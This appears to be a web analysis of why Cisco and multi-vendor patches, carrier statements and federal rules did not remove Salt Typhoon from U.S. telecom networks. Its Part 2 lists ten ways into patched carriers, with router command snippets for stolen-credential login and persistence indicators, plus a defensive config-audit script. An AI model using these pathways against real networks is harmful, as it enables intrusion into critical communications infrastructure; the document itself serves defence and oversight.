Active infections · patches that didn’t fix it

Why the patches didn’t fix the problem — and how Salt Typhoon could still get in today.

Two halves. Part 1: a technical analysis of why each claimed fix — Cisco CVE patches, the multi-vendor patch inventory, the AT&T / Verizon “contained” statements, CISA hardening, the FCC reporting rule, the withheld Mandiant assessments — does not actually close the Salt Typhoon TTP class. Part 2: a per-pathway breakdown, with command- and protocol-level detail, of how the actor could obtain initial access to a fully-patched U.S. carrier network today. Both halves are anchored against the FBI’s on-record February 2026 position that the threat remains active.

Status as of February 2026: “The threat posed by Salt Typhoon actors and the rest of the PRC intelligence apparatus … is still very, very much ongoing.” — Michael Machtinger, Deputy Assistant Director for Cyber Intelligence at the FBI, CyberTalks event, Washington D.C., February 19, 2026.[1]
Part 1 · Why each patch failed

The technical reasons every claimed fix is non-persistent

Each card below documents what the fix technically covers, what it provably does not cover, and why the residual gap remains exploitable against the documented Salt Typhoon TTP class.[2]

Vendor patch · Cisco IOS XE / IOS Classic CVE patches (CVE-2018-0171, CVE-2023-20198, CVE-2023-20273) · Status: Partial

Cisco shipped the Smart Install fix in 2018 and the IOS XE Web UI chain (CVE-2023-20198 privilege escalation + CVE-2023-20273 command injection) in October 2023.[3] The image upgrade closes the unauthenticated entry vector on patched devices: the web-UI account-creation path is blocked, the Smart Install service can be disabled (no vstack), and the WSMA endpoint validation is hardened.

What the patch does NOT do

Pre-existing accounts created via the bug remain in startup-config. The patch is an image upgrade; it does not audit show running-config | include username for accounts added during the exploitation window. The patched router boots with the attacker’s local accounts intact.

It does not remove the persistence kit. GRE tunnel interfaces (interface Tunnel0 / tunnel mode gre ip / tunnel destination <attacker>), AAA / TACACS+ server IP swaps, ACL drift admitting attacker source IPs, and SNMP community-string changes all survive the image upgrade as part of running- and startup-config.[2]

It does not remove the alternate-port SSH backdoor. The Linux-side sshd_operns daemon Talos documented on TCP 57722 — with authorized_keys added under root via /etc/passwd / /etc/shadow modification — is not touched by the IOS XE image patch.[2]

It does not address ROMMON-level persistence. Per MITRE T1542.004,[4] defenders cannot independently validate ROMMON image integrity without vendor support. The image patch reaches the IOS XE binary; it does not reach the boot loader.

It does not rotate stolen credentials. Per Talos, the primary initial-access vector in investigated incidents was legitimate stolen credentials — not CVE exploitation.[2] A patched router is still trivially accessible with a stolen-but-not-rotated admin credential.

Deployment lag is the secondary surface. Salt Typhoon weaponized CVE-2023-20198 fourteen months after the patch shipped; the lag between “Cisco shipped a fix” and “every carrier has it deployed in production” is itself the attack window.

Vendor patch · Multi-vendor edge-device patches (Palo Alto, Ivanti, Fortinet, Sophos, Exchange, Citrix) · Status: Partial

The CISA joint advisory AA25-239A[5] lists fixes for: Palo Alto CVE-2024-3400; Ivanti CVE-2024-21887 and CVE-2023-46805; Fortinet CVE-2023-48788; Sophos CVE-2022-3236; Microsoft Exchange CVE-2021-26855 (ProxyLogon); Citrix NetScaler CVE-2025-5777 (CitrixBleed 2, added to CISA KEV July 11, 2025).

What the patches do NOT do

Same gap as the Cisco patches: each closes its respective N-day entry vector on patched devices, but none addresses the persistence kit, credential rotation, ROMMON, or the lateral-trust graph already established.

Censys continues to find tens of thousands of public exposures of the affected device families through 2025 and into 2026[6] — the patches exist; deployment is uneven; the Censys analysis explicitly cautions that observed exposure declines may reflect routine reconfiguration rather than successful remediation.

CitrixBleed 2 is a memory-overread. The vulnerability discloses session tokens, which an attacker can then replay to bypass MFA on the NetScaler gateway.[7] Patching closes the read; it does not invalidate session tokens already exfiltrated.

Carrier statement · AT&T — “We detect no activity by nation-state actors” (December 2024) · Status: Not persistent

AT&T’s December 2024 statement[8] rests on a visibility-based assessment: “we don’t see them.”

Why visibility-based assertion is not persistent against this actor

Standard IOS XE auditing commands do not surface Guest Shell processes. Salt Typhoon’s documented playbook enables Guest Shell (guestshell enable) and deploys tooling inside the Linux container. show process cpu, show users, and show running-config on the network OS do not enumerate processes running inside the guest container.[2]

JumbledPath impairs logging along the jump-path. Talos documents that the actor’s custom Go ELF binary “attempted to clear logs and impair logging along the jump-path”[2] — the very evidence the carrier’s detection rests on is what the actor explicitly removes.

GRE-tunneled exfil looks like legitimate routing. Mirroring traffic into a GRE tunnel encapsulates the bytes inside an outer header that defensive netflow attributes to routing, not data exfiltration.[9] Carrier flow analytics that don’t inspect inside GRE see clean routing traffic.

ROMMON-level implants live below the carrier’s visibility stack. Pre-OS boot persistence (MITRE T1542.004[4]) operates before the IOS XE OS starts; carrier EDR / SIEM cannot reach it.

The Mandiant forensic assessment exists, and AT&T refused to provide it when Senator Cantwell demanded the documentation for Senate Commerce oversight.[10] The forensic evidence the “no activity detected” claim would rest on is withheld from congressional review.

FBI counter-assessment. CISA / FBI on the record in December 2024 said Salt Typhoon was still active in U.S. networks;[11] FBI reiterated the position in February 2026.[1]

Carrier statement · Verizon — “contained the cyber incident” (December 2024) · Status: Not persistent

Verizon’s December 2024 statement[8] uses the word “contained” with no technical definition attached. The company stated it “cannot provide specific details about their responsive actions because doing so would jeopardize cybersecurity protection methodologies.”

Why the “contained” framing is not persistent

“Contained” is not a defined technical term. It could mean: a specific GRE tunnel on a specific router was removed; or: detection signatures were deployed; or: a network segment was isolated. None of these is a synchronized-cut eviction across the affected estate.

CISA AA25-239A explicitly states that partial response alerts the actor. “Partial response actions may alert the actors to an ongoing investigation and jeopardize the ability to conduct full eviction.”[5] A “contained” framing that isn’t simultaneous across the trust graph (iBGP, OSPF/ISIS, TACACS+, SNMPv3) increases the risk of further entrenchment elsewhere.

Verizon also engaged Mandiant. Verizon also refused to provide the Mandiant report to Senator Cantwell.[10] Same withholding pattern as AT&T.

Senate Commerce expert testimony, December 2025. Expert witnesses unanimously concluded U.S. communications networks remain vulnerable.[12]

Carrier statement · T-Mobile / Lumen / Charter / Windstream / Consolidated / Viasat — silent or sparse · Status: Unknown

T-Mobile claimed “hackers had no access to customer call and text logs”;[13] Lumen claimed containment without public technical detail; Charter, Windstream, Consolidated, and Viasat have not made remediation statements at the level of AT&T or Verizon.

Why silence is not persistence

None of the six carriers has published an audit-shaped remediation report. The Senate Commerce documentation demand was targeted primarily at AT&T and Verizon; the other six remain unaudited in public record. Persistence is unknown because the work is unknown.

Federal guidance · CISA — December 2024 hardening and AA25-239A (August 2025) · Status: Partial

CISA shipped concrete controls: no vstack (Smart Install off), no ip http server / no ip http secure-server (web UI off), VTY transport output none, trailing deny any any log ACL hygiene, Type 8 / Type 6 credential storage, SSH listener audit, simultaneous-eviction discipline, OOB management.[5]

Why guidance alone is not persistence

CISA guidance is voluntary. Carriers are not compelled to adopt, audit against, or document compliance.

The one enforceable companion piece was rolled back. The FCC’s Communications-Service-Provider Cybersecurity Reporting Requirements — the only audit-shaped federal rule with teeth — was partially rolled back in November 2025; the FCC’s own draft ruling conceded the underlying vulnerabilities “are still being exploited.”[14]

Private IR · Mandiant — AT&T and Verizon forensic assessments (withheld) · Status: Unknown / withheld

Both AT&T and Verizon confirmed they engaged Mandiant.[10] Both refused to provide the assessment to Senator Cantwell when Senate Commerce demanded the documentation.

Why withheld assessments are not persistence

By definition: what is not disclosed cannot be audited. The methodology, scope, and conclusions of the assessments are unknown. Whether the assessment covered ROMMON validation, credential rotation, the SS7 / Diameter layer, or even the simultaneous-eviction discipline CISA AA25-239A requires — none of that is in public record.

Part 1 · Synthesis

Persistence-dimension scoring across all claimed fixes

Each fix is scored against the six dimensions a real remediation would have to cover. The dimensions are derived from the Talos persistence-kit inventory,[2] the credential-layer surface,[15] the ROMMONkit / firmware layer,[4] the SS7/Diameter signaling layer,[11] the auditability requirement, and the simultaneous-eviction constraint.[5]

| Claimed fix | Removes persistence kit | Rotates credentials | Addresses ROMMON | Touches SS7 / Diameter | Documented & auditable | Synchronized cut |
|---|---|---|---|---|---|---|
| Cisco CVE patches | no | no | no | n/a | yes | n/a |
| Multi-vendor CVE patches | no | no | no | n/a | yes | n/a |
| AT&T “no activity detected” | unknown | unknown | unknown | no | withheld | unknown |
| Verizon “contained” | unknown | unknown | unknown | no | withheld | unknown |
| Other 6 telecoms (silent) | unknown | unknown | unknown | no | no | unknown |
| CISA hardening guidance | partial (if adopted) | partial (if rotated) | no | no | voluntary | partial |
| FCC reporting rule | n/a | n/a | n/a | n/a | rolled back Nov 2025 | n/a |
| Mandiant assessments | withheld | withheld | withheld | withheld | withheld | withheld |

Reading horizontally: no claimed fix scores “yes” across all six dimensions. Reading vertically: no dimension scores “yes” across all the claimed fixes. The gap isn’t any one fix — the gap is the absence of an integrated operation with documented, simultaneous, multi-dimensional coverage.

Part 2 · Initial-access pathways still open

How Salt Typhoon could still obtain initial access today

The pathways below are independently sufficient for fresh initial access to a fully-patched carrier network. Each is grounded in either the Talos IR documentation, the CISA joint advisory, or contemporaneous public reporting; none requires a novel zero-day.

  1. Credential reuse on fully-patched routers.

    Per Cisco Talos, the primary initial-access vector in investigated incidents was the threat actor obtaining legitimate victim login credentials, not CVE exploitation.[2] Anne Neuberger’s December 2024 White House briefing put the stolen-credential surface at ~100,000 router admin accounts.[15] A fully-patched IOS XE router with a stolen-but-not-rotated admin credential authenticates a login as legitimate. The patch is irrelevant.

    # Pathway P1 — fully-patched router; stolen credential still valid:
    $ ssh admin@<carrier-router>
    admin@<carrier-router>'s password: # stolen credential, never rotated
    <router>> enable
    <router># # full administrative shell on a patched device

  2. Re-use of surviving persistence-kit footholds left in running-config.

    If the carrier’s remediation did not audit the device’s running-config against a golden template, every Talos-documented config-level persistence indicator survives the image patch:

    # Pathway P2 — running-config indicators that survive patching:
    <router># show running-config | include tunnel mode gre
     tunnel mode gre ip                              # surviving GRE exfil tunnel
    <router># show running-config | include username
     username typhoon_admin privilege 15 secret ...  # attacker-added local user
    <router># show running-config | section tacacs-server
     tacacs-server host <attacker-ip>                # AAA server IP swap
    <router># show ip sockets | include 57722
     tcp     57722        0.0.0.0:0      LISTEN     # sshd_operns backdoor
    <router># show guestshell
     Guest Shell: Enabled                            # container with attacker tools

    Any one of these is sufficient for fresh access; CISA’s remediation guidance is to audit every line.[5] Without that audit, the patch closes the front door while the back doors remain open.

  3. End-of-life and legacy platforms that cannot be patched.

    Cisco IOS Classic 12.x ISRs, EOL Catalyst 6500 supervisor engines, and legacy NX-OS chassis are out of vendor support. No patch ships. Salt Typhoon’s CVE-2018-0171 (Smart Install) Talos-confirmed exploitation case[2] sits on exactly this class of device. The only fix is physical replacement; until then, the entry vector remains live.

  4. Multi-vendor N-day inventory not deployed at every carrier.

    The joint advisory inventory[5] spans Cisco, Palo Alto (CVE-2024-3400), Ivanti (CVE-2024-21887, CVE-2023-46805), Fortinet (CVE-2023-48788), Sophos (CVE-2022-3236), Microsoft Exchange (CVE-2021-26855 ProxyLogon), and Citrix NetScaler (CVE-2025-5777 CitrixBleed 2). Carrier ecosystems include hundreds of vendor-adjacent devices: VPN concentrators, jump hosts, mail gateways, identity infrastructure. Any one un-patched device on any of these vendors is an alternative entry path into the same carrier network. Censys reports tens of thousands of public exposures across these families as of 2026.[6]

  5. CitrixBleed 2 (CVE-2025-5777) — recent disclosure, session-token disclosure.

    An out-of-bounds memory read on NetScaler Gateway / AAA virtual servers (CVSS 9.3) lets an unauthenticated attacker read process memory and recover valid session tokens, which can then be replayed to bypass MFA on the gateway.[7] Added to the CISA KEV catalog on July 11, 2025. Patching closes the read; it does not invalidate session tokens already exfiltrated. Any carrier or carrier-adjacent organization running unpatched 14.1 prior to 14.1-43.56, 13.1 prior to 13.1-58.32, or EOL 12.1 / 13.0 has either an active or a historical exposure.

  6. Variant-hunt against already-disclosed bug-class sink families.

    Salt Typhoon’s observed tradecraft is variant research:[5] patched advisories become the seed for sibling-sink hunts in the same binary. The Web Services Management Agent (WSMA) sink class that yielded CVE-2023-20198 / CVE-2023-20273 is the kind of surface where a second variant remains findable by an actor running the workflow continuously and not by defenders without equivalent automation. The 14-month gap between CVE-2023-20198 disclosure and its weaponization at scale is the empirical proof that this pathway works on the offensive side and isn’t being matched on the defensive side.

  7. SS7 / Diameter signaling-layer abuse — un-patchable by design.

    SS7 (2G/3G) and Diameter (4G/5G control plane) lack origin authentication by protocol design. Any peer connected to the SS7 international transit network can issue queries that the receiving switch will honor; fraudulent signaling sources can be inserted at HLR / HSS, MSC, MME, or PGW boundaries. The defense is architectural — SS7 firewalls (Mavenir, Adaptive Mobile, Cellusys) at the interconnect, Diameter Edge Agent screening per GSMA FS.11 / FS.19 — not a patch.[11] Until that architectural fix is universally deployed (years and billions of dollars per public reporting), the signaling plane remains a parallel persistence path independent of the IP-layer device fleet.

  8. Compromised backups restored after the cut.

    Any device backup or startup-config produced during the residency window (March 2024 onward for the National Guard case;[16] 2023–2024 for the carrier compromises) is presumed contaminated. A carrier ops engineer restoring “known good” config from such a backup re-installs the persistence kit on the patched device. The CISA simultaneous-eviction guidance[5] specifies rebuilding from a golden template, not from device backups — absent that discipline, backup restore is itself a re-introduction pathway.

  9. National Guard exfiltration data weaponized as initial-access intelligence.

    Per the June 2025 DHS memo,[16] Salt Typhoon exfiltrated from a U.S. state’s Army National Guard network: administrator credentials, full network diagrams, geographic-location maps, PII of service members, and the unit’s data traffic with counterparts in every other U.S. state and at least four U.S. territories. The memo also counts 1,462 network-configuration files taken from ~70 U.S. government and critical-infrastructure entities across 12 sectors during 2023–2024. This is pre-positioned intelligence: the loot from one Guard unit maps directly onto the topology of the cybersecurity partners of every other unit. Future intrusions land on networks whose layout the actor already has in hand. The DHS memo’s explicit warning is that this likely enables follow-on compromise of other state Guard units and their fusion-center partners.

  10. Fresh credential theft against engineers with router access.

    Even if the original ~100,000-credential surface were fully rotated tomorrow, the next phishing campaign against a carrier engineer with TACACS+ / RADIUS credentials, or with FIDO2-but-misconfigured admin auth, reproduces the credential-reuse pathway above. Per CISA hardening guidance,[5] phishing-resistant MFA on every admin account is the structural defense; absent that, fresh credentials enter the actor’s rotation continuously.
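The running-config audit that the Cisco card in Part 1 and Pathway P2 both note the image patch never performs, as an added example (not code from this page, from Cisco, Talos or CISA): it walks a constructed IOS XE running-config, diffs the local accounts, TACACS+ hosts and GRE tunnel destinations against a constructed golden template, and reports which CISA hardening lines are absent. The golden values, the sample config, the 203.0.113.x addresses and the finding labels are all assumptions made for the example.

```python
"""Audit an IOS XE running-config for the persistence indicators and missing
hardening discussed on this page. Added example: the golden template, the
sample config and the finding labels are constructed, not from any carrier."""
import re

# Constructed golden template for one device class (assumed, not from the page).
GOLDEN = {
    "users": {"netops"},           # the only local account the template allows
    "tacacs_hosts": {"10.0.0.5"},  # the carrier's real TACACS+ server
    "tunnel_dests": set(),         # this device class should carry no GRE tunnels
}

# Constructed running-config seeded with several indicators the page describes.
SAMPLE_CONFIG = """\
version 17.9
ip http server
iox
username netops privilege 15 secret 9 $9$CONSTRUCTED1
username typhoon_admin privilege 15 secret 9 $9$CONSTRUCTED2
interface Tunnel0
 tunnel mode gre ip
 tunnel destination 203.0.113.7
tacacs-server host 10.0.0.5
tacacs-server host 203.0.113.9
line vty 0 4
 transport input ssh
end
"""


def audit_config(config, golden):
    """Return (category, detail) findings: lines that differ from the golden
    template plus CISA hardening lines that are missing from the config."""
    findings = []
    for ln in config.splitlines():
        ln = ln.rstrip()
        m = re.match(r"^username (\S+) privilege 15", ln)
        if m and m.group(1) not in golden["users"]:
            findings.append(("local-account", m.group(1)))   # attacker-added user
        m = re.match(r"^\s*tunnel destination (\S+)$", ln)
        if m and m.group(1) not in golden["tunnel_dests"]:
            findings.append(("gre-tunnel", m.group(1)))      # mirroring / exfil tunnel
        m = re.match(r"^tacacs-server host (\S+)$", ln)
        if m and m.group(1) not in golden["tacacs_hosts"]:
            findings.append(("aaa-server", m.group(1)))      # AAA server IP swap
        if re.match(r"^ip http (secure-)?server$", ln):
            findings.append(("web-ui", ln))                  # CVE-2023-20198 surface
        if ln == "iox":
            findings.append(("iox", ln))                     # Guest Shell prerequisite
    # Hardening lines whose absence matters: "no vstack" (Smart Install off) and
    # "transport output none" on the VTY lines (router cannot be used as a hop).
    if not re.search(r"^no vstack$", config, re.M):
        findings.append(("smart-install", "no vstack absent"))
    if re.search(r"^line vty", config, re.M) and not re.search(
        r"^\s*transport output none$", config, re.M
    ):
        findings.append(("vty-egress", "transport output none absent"))
    return findings


if __name__ == "__main__":
    for category, detail in audit_config(SAMPLE_CONFIG, GOLDEN):
        print(f"{category:14} {detail}")
```

The same function run against a config exported from a golden template returns an empty list, which is the condition a carrier's remediation would need to document per device.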

Bottom line

The patches close some entry vectors. None of them removes a resident attacker, rotates the credential surface, validates ROMMON, addresses the signaling plane, or audits the running-config persistence kit. Each of the ten pathways above remains independently sufficient for fresh initial access to a fully-patched carrier today. That is why the FBI is still on the record — in February 2026 — calling Salt Typhoon “still very, very much ongoing.”[1]

What removal would actually require — the simultaneous-eviction discipline, the six-criterion closure definition, the synchronized-cut planner, and the federal brokering authority — lives on the Closure, eviction runbook, and Salt Typhoon Research pages.

References

  1. CyberScoop. FBI: Threats from Salt Typhoon are ‘still very much ongoing’. CyberTalks event, February 19, 2026. cyberscoop.com/fbi-salt-typhoon-ongoing-threat-cybertalks-2026/. Speaker: Michael Machtinger, Deputy Assistant Director for Cyber Intelligence at the FBI.
  2. Cisco Talos. Weathering the storm: In the midst of a Typhoon. February 2025. blog.talosintelligence.com/salt-typhoon-analysis/. Primary source for the credential-first finding, JumbledPath, GRE-tunnel persistence, Guest Shell abuse, sshd_operns on 57722, and the running-config / log-clearing inventory.
  3. Cisco. Cisco IOS XE Software Hardening Guide and PSIRT advisories for CVE-2018-0171, CVE-2023-20198, CVE-2023-20273. sec.cloudapps.cisco.com/security/center/resources/IOS_XE_hardening.
  4. MITRE ATT&CK. Pre-OS Boot: ROMMONkit, Sub-technique T1542.004. attack.mitre.org/techniques/T1542/004/.
  5. CISA, NSA, FBI, and international partners. Joint Cybersecurity Advisory AA25-239A: Chinese state-sponsored cyber actors. August 27, 2025. cisa.gov/news-events/cybersecurity-advisories/aa25-239a. Source for the simultaneous-eviction discipline and the multi-vendor CVE inventory.
  6. Censys. The Persistent Threat of Salt Typhoon: Tracking Exposures of Potentially Targeted Devices. 2026. censys.com/blog/the-persistent-threat-of-salt-typhoon-tracking-exposures-of-potentially-targeted-devices.
  7. Citrix Support · SocRadar · SentinelOne. CVE-2025-5777 NetScaler Gateway / AAA virtual server memory-overread (CitrixBleed 2). support.citrix.com — CTX693420; socradar.io — CitrixBleed 2. Added to CISA KEV July 11, 2025.
  8. Cybersecurity Dive. AT&T, Verizon say they evicted Salt Typhoon from their networks. December 2024. cybersecuritydive.com/news/att-verizon-salt-typhoon.
  9. Industrial Cyber. Salt Typhoon used GRE tunnels for traffic mirroring and exfiltration on compromised Cisco devices. February 2025. industrialcyber.co — Salt Typhoon LOTL.
  10. U.S. Senate Committee on Commerce, Science, and Transportation. Cantwell seeks digital forensics expert’s assessments of AT&T and Verizon network security; demands AT&T, Verizon CEOs come clean. commerce.senate.gov. Source for the Mandiant-assessments-withheld claim.
  11. CyberScoop. U.S. government says Salt Typhoon is still in telecom networks. December 3, 2024. cyberscoop.com/u-s-government-says-salt-typhoon-is-still-in-telecom-networks; A house full of open windows: Why telecoms may never purge their networks of Salt Typhoon, cyberscoop.com/salt-typhoon-chinese-hackers-us-telecom-breach.
  12. U.S. Senate Committee on Commerce, Science, and Transportation. Experts agree U.S. communications networks remain vulnerable following Salt Typhoon hack. December 2025. commerce.senate.gov/2025/12/experts-agree-u-s-communications-networks-remain-vulnerable.
  13. TechCrunch. Salt Typhoon is hacking the world’s phone and internet giants — here’s everywhere that’s been hit. March 2026. techcrunch.com/2026/03/09/salt-typhoon-china-who-has-been-hacked-global-telecom-giants.
  14. U.S. Senate Committee on Commerce, Science, and Transportation. Cantwell statement on the FCC’s rollback of post-Salt-Typhoon network-protection rules. November 2025. commerce.senate.gov — Cantwell on FCC rollback.
  15. Anne Neuberger, Deputy National Security Advisor for Cyber and Emerging Technology. White House press briefing remarks on Salt Typhoon — nine confirmed U.S. carrier compromises and the ~100,000-router admin credential figure. December 2024.
  16. Department of Homeland Security · Office of Intelligence and Analysis. Salt Typhoon: Data Theft Likely Signals Expanded Targeting. Memo dated June 11, 2025. Obtained via FOIA by Property of the People; first reported by NBC News. nbcnews.com.